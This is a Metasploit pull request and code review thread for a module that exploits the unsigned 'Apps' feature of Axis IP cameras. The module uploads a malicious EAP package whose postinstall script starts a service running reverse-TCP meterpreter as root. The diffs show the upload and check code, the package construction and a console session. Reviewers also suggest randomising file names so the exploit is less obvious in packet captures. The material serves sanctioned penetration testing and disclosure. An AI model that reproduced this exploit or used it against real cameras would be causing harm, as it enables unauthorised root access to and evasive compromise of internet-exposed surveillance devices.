### PR TITLE
Axis Camera App RCE (No CVE)

### PR DESCRIPTION
**Pull request by jbaines-r7**
## Background

This is an issue I disclosed to Axis back in 2017 and [published](https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness) in 2018. No CVE was assigned, and the vendor indicated a plan to address "in the next generation." I revisited this on the latest firmware (Dec. 2021) for a device I have on hand, and the issue persists.

Given that dome cameras are ubiquitous and Axis is a popular vendor (Shodan indexes some 30k likely vulnerable internet facing [doodads](https://www.shodan.io/search?query=html%3A%22Axis+Communications+AB%22)). I figured it would be a fun module to write (it actually was somewhat miserable but :shrug:).

## Description

This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party developers to upload and execute  'eap' applications on the device. The system does not validate the application comes from a trusted source, so a malicious attacker can upload and execute arbitrary code. The issue has no CVE, although the technique was made public in 2018.

This module uploads and executes stageless meterpreter as `root` via the application upload feature. The module will also  uninstall the application upon completion. Uploading the application requires valid credentials. The default administrator credentials used to be `root:root` but newer firmware versions force users to provide a new password for the `root` user.

The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021). All devices that support the "App" feature are presumed to be vulnerable at this time.

## Development Quirks

Execution is first established via a bash "post installation" script. The script is executed as a systemd oneshot. That's not great for an exploit as all children will be reaped after the parent exits... executing from post installation also holds the HTTP connection open. All around not good.

My solution was to create a second service that will execute stageless Meterpreter. That seemed to work nicely, but obviously is an extra moving part.

I also elected not to implement a CMD_ARCH payload. The only one that technically works is `reverse_openssl` and it has to be fairly heavily modified. I fiddled around with the idea of adding a new `single` that uses openssl / mkfifo but ultimately decided I'd had enough of the camera, and that having meterpreter on system was better anyway.

The device actually supports both HTTP and HTTPs. Shodan has way more HTTP endpoints though, so I left HTTP as the default setting.

Finally, I want reiterate that the armle starger is unstable. Including on this platform. See #16107.

## Verification

Acquire an affected device:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/axis_app_install`
- [ ] `set RHOST <ip>`
- [ ]  `set PASSWORD <password>`
- [ ] `check`
- [ ] Verify the remote target is flagged as vulnerable
- [ ]  `set LHOST <ip>`
- [ ]  `exploit`
- [ ]  You should get a Meterpreter session.

## PCAP || GTFO

[axis_camera_meterpreter.zip](https://github.com/rapid7/metasploit-framework/files/8065204/axis_camera_meterpreter.zip)

## Video || GTFO

https://www.youtube.com/watch?v=q7OtSkwpeqY

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
Rerunning checks but seems it was just some temp Docker issue due to Alpine servers acting up again so not too concerned.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 1]
```diff
@@ -0,0 +1,250 @@
...
+      'password' => datastore['PASSWORD'],
+      'uri' => uninstall_endpoint,
+      'vars_get' => {
+        'action' => 'remove',
+        'package' => appname.to_s
+      }
+    })
+
+    # check for successful removal
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
```
Comment (bwatters-r7) [inline modules/exploits/linux/http/axis_app_install.rb:246]: 'fail_with' might not be the best thing here- it is possible we could have a session, fail to clean up, and generate a failure for the module on not cleaning up.  It might be better to use something like `print_bad` and uninstall instructions?
You could also look into moving this to a cleanup method within the module...

Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb:246]: Yeah, you're right. `fail_with` is bad here. I'll switch it over to `print_bad`.

I *think* `cleanup` is only called on success? I could very well be wrong.  I used `ensure` to clean up as it's a similar situation to the Nagios issue discussed in module hacking... three weeks ago? Part of that conversation manifested [here](https://github.com/rapid7/metasploit-framework/pull/16150/files#r804296811). Anyway, the idea being that the app could install and the meterpreter session might not appear, but we still want to uninstall the app regardless 🤷  If that belongs in cleanup, I'm happy to move it... but the documentation isn't [super clear](https://www.rubydoc.info/github/rapid7/metasploit-framework/Msf%2FExploit:cleanup) about when it runs :)

**Comment by jbaines-r7** [comment]
Updated to address @bwatters-r7's comment regarding `fail_with`. I also included information about manually uninstalling, although (hopefully) it never comes to that. Updated pcap attached.

[axis_camera_meterpreter_updated.zip](https://github.com/rapid7/metasploit-framework/files/8133855/axis_camera_meterpreter_updated.zip)

**Comment by gwillcox-r7** [comment]
Quick comment that I think is relevant but the camera you tested this on is now discontinued. https://www.axis.com/products/axis-m3064-v/support lists the newer supported camera however the firmware version is the same as noted on February 24th 2022 and can be found at https://www.axis.com/ftp/pub/axis/software/MPQT/M3064-V/9_80_3_8/M3064-V_9_80_3_8_release_notes.txt.

**Comment by gwillcox-r7** [comment]
On a related note to above, I think we need to narrow down affected versions more. I tried searching on the site for Axis IP camera's but they don't seem to call them that so finding affected versions is.....well its tricky to say the least 😅

File: documentation/modules/exploit/linux/http/axis_app_install.md [hunk 2]
```diff
@@ -0,0 +1,108 @@
...
+the application comes from a trusted source, so a malicious attacker can upload and execute
+arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+This module uploads and executes stageless meterpreter as `root` via the application upload
+feature. The module will also uninstall the application upon completion. Uploading the application
+requires valid credentials. The default administrator credentials used to be `root:root` but
+newer firmware versions force users to provide a new password for the `root` user.
+
+The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+All devices that support the "App" feature are presumed to be vulnerable at this time.
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:16]: Also r.e the `App` feature, this is a good callout, though given other firmware also seems to support these sorts of features that might not be vulnerable, I'd want to just check this isn't inadvertently broadening the scope of affected devices too much.

File: documentation/modules/exploit/linux/http/axis_app_install.md [hunk 3]
```diff
@@ -0,0 +1,108 @@
...
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/axis_app_install) > set RHOST 192.168.1.183
+RHOST => 192.168.1.183
+msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.220
+LHOST => 192.168.1.220
+msf6 exploit(linux/http/axis_app_install) > set password labpass1
+password => labpass1
+msf6 exploit(linux/http/axis_app_install) > check
+[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
+msf6 exploit(linux/http/axis_app_install) > run
```
Comment (gwillcox-r7) [inline documentation/modules/exploit/linux/http/axis_app_install.md:67]: Might want to update this with a `show options` output to show that you are authenticating as `root`. Not a deal breaker but its nice to see the options that are being used for future debugging purposes in case something breaks or we change the code later on and need to refer back to what worked.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 4]
```diff
@@ -0,0 +1,254 @@
...
+          'jbaines-r7' # Discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],
+          [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']
+        ],
+        'DisclosureDate' => '2018-04-12',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Privileged' => false,
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:43]: Would we not consider that to be privileged given this executes code as `root`? 
```suggestion
        'Privileged' => true,
```

File: modules/exploits/linux/http/axis_app_install.rb [hunk 5]
```diff
@@ -0,0 +1,254 @@
...
+          developers to upload and execute 'eap' applications on the device. The system does not validate
+          the application comes from a trusted source, so a malicious attacker can upload and execute
+          arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+          This module uploads and executes stageless meterpreter as `root`. Uploading the application
+          requires valid credentials. The default administrator credentials used to be `root:root` but
+          newer firmware versions force users to provide a new password for the `root` user.
+
+          The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+          Although all modules that support this feature are presumed to be vulnerable.
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:30]:
```suggestion
          Although all modules that support the "Apps" feature are presumed to be vulnerable.
```

Suggestion to be more explicit otherwise given you mention the "Apps" feature 2 paragraphs up its possible to think this might be related to some other unnamed feature.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 6]
```diff
@@ -0,0 +1,254 @@
...
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:55]: Only mentioning this as Spencer did a similar change but do we need to specify a default payload? Speaking to him recently the consensus was that we should not be setting default payloads unless absolutely needed and this doesn't appear to be a case where we need to explicitly limit the default payload, however given your development difficulties I'd just like to double check on this.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 7]
```diff
@@ -0,0 +1,254 @@
...
+    # check to see if the applications api exists (also tests credentials)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')
+    })
+
+    # A strange edge case where there is no response... respond detected
+    return CheckCode::Detected unless res
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:108]: Nice checking for edge cases, appreciate the extra testing on this 👍

File: modules/exploits/linux/http/axis_app_install.rb [hunk 8]
```diff
@@ -0,0 +1,254 @@
...
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')
+    })
+
+    return CheckCode::Unknown unless res && (res.code == 200)
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+
+    # The brand / model are now known
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:97]: Minor comment but `ProdShortName` field contains this info already combined. Might help reduce some combination efforts.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 9]
```diff
@@ -0,0 +1,254 @@
...
+    # A strange edge case where there is no response... respond detected
+    return CheckCode::Detected unless res
+    # Respond safe if credentials fail, to prevent the exploit from running
+    return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401
+    # Assume any non-200 means the API doesn't exist
+    return CheckCode::Safe(check_comment) if res.code != 200
+
+    # This checks for an XML response which I'm not sure is smart considering most of the device
+    # does JSON replies... the concerning being that this response has changed in newer models
+    return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">') != 200
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:116]: Given the comment here we may want to consider doing some more testing if this might be a concern.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 10]
```diff
@@ -0,0 +1,254 @@
...
+
+    CheckCode::Appears(check_comment)
+  end
+
+  # Creates a malicious "eap" application. The package application will gain execution
+  # through the postinstall script. The script, which executes as a systemd oneshot, will
+  # create and execute a new service for the payload. We have to d this because the oneshot
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:123]:
```suggestion
  # create and execute a new service for the payload. We have to do this because the oneshot
```

File: modules/exploits/linux/http/axis_app_install.rb [hunk 11]
```diff
@@ -0,0 +1,254 @@
...
+  # child processes will be reaped when the main binary exits. Executing the payload from
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:124]: Some people might not get the term `will be reaped`. I get maybe that the term `kill` might not want to be used here (for various reasons) but perhaps saying `will all be terminated` would be more appropriate and easier to understand? Just a thought.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 12]
```diff
@@ -0,0 +1,254 @@
...
+    print_status("Creating an application package named: #{appname}")
+    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
+
+    package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \
+      "APPTYPE='lua'\n" \
+      "APPNAME='#{appname}'\n" \
+      "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \
+      "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:144]: Know this is odd to ask but any possibility one can do ranges of say 1 to 3 numbers for something like the micro version? Or are these fields all strictly 1 byte long?

File: modules/exploits/linux/http/axis_app_install.rb [hunk 13]
```diff
@@ -0,0 +1,254 @@
...
+  # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked
+  # for some required libraries whereas the lua version is just accepted.
+  #
+  # The construction of the eap follows this pattern:
+  # * tar -cf exploit payload package.conf postinstall.sh payload.service
+  # * gzip exploit
+  # * mv exploit.gz exploit.eap
+  def create_eap(payload, appname)
+    print_status("Creating an application package named: #{appname}")
+    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:136]: Only comment is that 2-4 characters seems rather small range for a script name. I don't think this would be limited to that size but just want to double check as it stood out as a bit odd to me.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 14]
```diff
@@ -0,0 +1,254 @@
...
+    end
+    tarfile.rewind
+    tarfile.close
+
+    Rex::Text.gzip(tarfile.string)
+  end
+
+  # Upload the malicious EAP application for a root shell. Always attempt to uninstall the application
+  def exploit
+    appname = Rex::Text.rand_text_alpha_lower(3)
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:200]: I think we can make this a range at the very least (1..3). Also not sure if limiting this to 3 characters when this could be longer?

File: modules/exploits/linux/http/axis_app_install.rb [hunk 15]
```diff
@@ -0,0 +1,254 @@
...
+
+    # instructions for manually removal if the above fails. That should never happen, but best be safe.
+    removal_instructions = 'To manually remove the application, log in to the system and then select the apps tab. ' \
+      "Find the app named '#{appname}' and select it. Click the trash bin icon to uninstall it."
+
+    # check for successful removal
+    print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res
+    print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200
+    print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')
+  end
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:253]:
```suggestion
  print_good("The application #{appname} was successfully removed from the target!")
  end
```
Might be good to alert the user when things do go right 😄

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]
Overall looks pretty good though had a few questions r.e randomization and a few places where I found some typos and wording suggestions that might deserve a further look. Note that some comments are minor suggestions based on further analysis, I just left them there to give some food for thought.

Only two major suggestions. One was the `DefaultOptions` section where Spencer told me recently that we shouldn't be setting that unless we have a valid reason so I left some notes there, but I'll leave you to decide if we need that based on your experience. Perhaps play around with taking that out and see if the module still works.

Other one is r.e vulnerable versions. See comments for more but TLDR is I think the current wording makes it hard for people to find vulnerable devices unless they use the `check` method. Happy to talk about this further though.

Let me know if anything is confusing, most of this should be fairly quick fixes though randomization checks may require a bit more time.

File: documentation/modules/exploit/linux/http/axis_app_install.md (hunk 2 above)
[the remark this answers is not in the document]
Comment (jbaines-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:16]: I'm not sure what you are saying, to be honest. What are you looking for in release notes and what about the firmware would we want to double?

File: modules/exploits/linux/http/axis_app_install.rb (hunk 6 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb:55]: For this module, without inserting a default payload, the stageless version of meterpreter won't be used. Stageless is desirable here since you can just upload it to the device (plus armle stager is broken).

So, this is intentional and I don't think it make sense to ever exclude a default payload in the first place 🤷

File: documentation/modules/exploit/linux/http/axis_app_install.md [hunk 16]
```diff
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party
```
[the remark this answers is not in the document]
Comment (jbaines-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:5]: The number of affected devices is far too long to list here. I see what you are saying though. The specific feature that allows exploitation is the Axis Camera Application Platform  - which is linked in the module (https://www.axis.com/support/developer-support/axis-camera-application-platform - this is 503ing atm, looks like their main website says they are suffering a cyber attack?).

Regardless, to my knowledge, *all their cameras* support this platform. And since this "feature" was never patched, it seems that all their devices should be affected. 🤷 I'm open to wording how you that should be described.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 9 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb:116]: The tested camera is on LTS into 2025. It isn't a huge concern, but worth noting for future readers. I'm also not buying more cameras to test this edge case 🤣

File: modules/exploits/linux/http/axis_app_install.rb (hunk 14 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb:200]: The official apps I looked at use 3 letters. I don't see a reason deviate 🤷

File: modules/exploits/linux/http/axis_app_install.rb (hunk 12 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb]: I have my doubts that using more or less randomization in a module is actually important. But you asked, so I altered minor to 1..2 and micro to 1..3.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 13 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb]: Altered for a wider range.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 14 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:200]: no problem that makes sense, marking resolved.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 9 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:116]: Haha fair fair and yeah wasn't too concerned about it was more just seeing if you wanted to investigate it further or not. Marking resolved due to emulation difficulties n time constraints for now.

File: documentation/modules/exploit/linux/http/axis_app_install.md (hunk 16 above)
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:5]: Ah so the reason I ask is that some of their devices seem to be running Axis OS and but the devices like the one that you tested seem to be running a separate OS. I guess this and the lack of being able to find that page easily on their website led  to my confusion. I'll chat tomorrow about this some more though I think its a bit hard to describe specifically over GitHub.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 6 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:55]: Makes sense in that case and since we can't filter by staged/stageless support (at least not to my knowledge) this seems like an acceptable case for this. In an ideal world the ARMLE stager would work properly but I understand the point that fixing that may take a while and this is an optimal solution in the meantime. If the ARMLE stager working would solve this, might I suggest we add a comment so that future observers can make appropriate changes if and when this is fixed? Just might help with code maintainability.

Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:55]: As for excluding a default payload its more that if one doesn't set it then it defaults to a set default. Speak to Spencer if you want more details as I know he made a similar change to my Exchange Server exploit at https://github.com/rapid7/metasploit-framework/pull/16164/commits/6d325933a99281e26c7091ed52a19a346959d0a8. I believe he mentioned it was to help keep the framework more uniform vs every exploit having their own set default, but he would be able to explain it better than I can.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 12 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb]: Its a fair point however I have seen reviews from coworkers mentioning it in the past so thought I'd bring it up. Ideally we want to make it as random as possible and this has always been a goal that our modules try to achieve, however to your credit I can also understand your point that in this particular scenario its not adding that much extra randomness.

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
@jbaines-r7 New changes look good, can discuss remaining open issues over Slack but for the most part I should just be able to review your PCAP and get this landed, as rest are documentation related changes👍

File: modules/exploits/linux/http/axis_app_install.rb [hunk 17]
```diff
@@ -0,0 +1,255 @@
...
+
+  # Upload the malicious EAP application for a root shell. Always attempt to uninstall the application
+  def exploit
+    appname = Rex::Text.rand_text_alpha_lower(3)
+    eap = create_eap(payload.encoded, appname)
+
+    # Instruct the application to install the constructed EAP
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')
+    multipart_form.add_part(eap, 'application/octet-stream', 'binary', 'form-data; name="fileData"; filename="exploit.eap"')
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:206]: Naming the file `exploit.eap` is kind of a dead giveaway of exploitation. Along with the filename being `blob` is there any way we can randomize this? Very obvious indicator in the PCAP.

File: modules/exploits/linux/http/axis_app_install.rb [hunk 18]
```diff
@@ -0,0 +1,255 @@
...
+    install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')
+    print_status("Sending an application upload request to #{install_endpoint}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => install_endpoint,
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    })
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/axis_app_install.rb:217]: Going to have to ask this but in the PCAP this and other requests where you set the username and password in this manner result in two requests being sent, one to check if authorization is needed for the request, and another to actually then send the request with the proper authentication. Given your request to upload the file is nearly 1MB in size, this may be a bit excessive.

I'd advise seeing if we need to adjust this to reduce double sending packets.

This comment applies to all instances where you are supplying the username and password to `send_request_cgi` in this manner. However in some cases it can be worse as we actually end up doing two requests, getting two 401 responses, and then authenticating properly.

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]
Some more things I noticed whilst examining the PCAPs, sorry for the extra review but thought these should be pointed out.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 18 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb:217]: What do you suggest as an alternative? This is literally how framework handles basic/digest authentication and, because the camera uses digest authentication there is no work around (other than changes to framework).

The size of the uploaded file doesn't matter. It's a single POST request.

File: documentation/modules/exploit/linux/http/axis_app_install.md (hunk 16 above)
[the remark this answers is not in the document]
Comment (jbaines-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:5]: I don't really follow the confusion. All their cameras run "Axis OS". It's just Linux. The M3044-V is no different. It uses the 9.80 LTS branch.

Why don't you just suggest wording that would make you happy?

**Comment by jbaines-r7** [comment]
Updated pcap
[axis_camera_again.zip](https://github.com/rapid7/metasploit-framework/files/8140619/axis_camera_again.zip)

File: modules/exploits/linux/http/axis_app_install.rb (hunk 17 above)
Comment (jbaines-r7) [reply modules/exploits/linux/http/axis_app_install.rb]: An oversight on my part. Fixed.

I would remind you though, that framework uses a multipart boundary that no one else uses and is therefore always a dead giveaway when multipart form is used.

File: documentation/modules/exploit/linux/http/axis_app_install.md (hunk 2 above)
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:16]: Yeah idk either. After reviewing this again with a fresh mind this should be fine as is. I was extending my concern r.e documentation and people not knowing what versions were affected too far. My apologies for all this.

File: documentation/modules/exploit/linux/http/axis_app_install.md (hunk 16 above)
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply documentation/modules/exploit/linux/http/axis_app_install.md:5]: After reviewing this again with a fresh mind this should be fine as is. I was extending my concern r.e documentation and people not knowing what versions were affected too far. People can just run the `check` method if they need to find this out. My apologies for all this.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 18 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:217]: Sorry I was not aware this was how Digest Authentication worked so upon reviewing your explanation this makes perfect sense. Closing as this is working as intended.

File: modules/exploits/linux/http/axis_app_install.rb (hunk 6 above)
Comment (gwillcox-r7) [reply modules/exploits/linux/http/axis_app_install.rb:55]: Alright so I'm just going to land this with a comment mentioning the issue at https://github.com/rapid7/metasploit-framework/issues/16107 as being why this needs to be set so that we can track things in the code a little easier should we need to identify what needs to be  updated once that fix has landed.

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
LGTM will land this now.

**Comment by gwillcox-r7** [comment]
# Release Notes

The "Apps" feature in Axis IP cameras allow allows third party developers to upload and execute 'eap' applications on the device, however no validation is performed to ensure the application comes from a trusted source. This module takes advantage of this vulnerability to allow authenticated attackers to upload and execute malicious applications and gain RCE.  Once the application has been installed and the shell has been obtained, the module will then automatically delete the malicious application. No CVE is assigned to this issue as a patch has not been released as of the time of writing.
